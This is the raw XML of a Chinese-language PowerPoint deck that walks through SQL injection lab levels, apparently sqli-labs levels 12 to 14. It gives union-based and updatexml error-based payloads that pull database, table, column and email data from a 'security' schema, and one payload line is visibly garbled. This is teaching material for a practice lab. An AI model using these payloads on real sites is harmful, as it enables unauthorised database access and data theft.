            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qwe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判断字段数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or 1=1 order by 2 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qwe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判断显错位：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union select 1,2 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qwe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判断库名：") union select 1,database() -- qwe</a:t>
            </a:r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判断表名：")union select 1,table_name from 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information_schema.tables where table_schema='security' -- qwe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判断列名：") ' aunion select 1,column_name from information_schema.columns where table_schema='securitynd table_name='emails' -- qwe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判断数据：")union select 1,id from emails-- qwe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40125" y="1376680"/>
            <a:ext cx="4754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这题的做法跟之前是一样的，只是闭合的区别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第十三关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26820" y="1858010"/>
            <a:ext cx="1000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35710" y="2060575"/>
            <a:ext cx="97764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判断是否存在注入：?id=1' and 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断库名： '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断表名：'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断列名：'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断数据：'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- qwe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68120" y="1228725"/>
            <a:ext cx="9956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另一种传参的报错注入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第十四关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35710" y="2060575"/>
            <a:ext cx="97764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判断是否存在注入：?id=1 " and 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断库名： "and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断表名：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断列名：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- qwe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68120" y="1228725"/>
            <a:ext cx="9956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另一种传参的报错注入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x272TGp_report_light">
  <a:themeElements>
    <a:clrScheme name="sx272TGp_report_light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A5A5A5"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="449CD8"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="CFCFCF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="3D8DC4"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="19B3B3"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="855ADA"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="sx272TGp_report_light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x272TGp_report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x272TGp_report_light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DF6521"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="D7D03B"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="ECB8AB"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="C3BC35"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="188FB4"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="A98F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x272TGp_report_light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A5A5A5"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="449CD8"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="CFCFCF"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="3D8DC4"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="19B3B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1525</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>104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黑体</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>sx272TGp_report_light</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>第八关</vt:lpstr>
      <vt:lpstr>第八关</vt:lpstr>
      <vt:lpstr>第九关</vt:lpstr>
      <vt:lpstr>第十关</vt:lpstr>
      <vt:lpstr>第十一关</vt:lpstr>
      <vt:lpstr>第十二关</vt:lpstr>
      <vt:lpstr>第十三关</vt:lpstr>
      <vt:lpstr>第十四关</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>中国信息安全测评中心:cisp运营中心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沈传宁</dc:creator>
  <cp:lastModifiedBy>随风</cp:lastModifiedBy>
  <cp:revision>3092</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-29T13:37:40Z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5EC77F3D4641451695A3550036DF892C</vt:lpwstr>
  </property>
</Properties>
</file>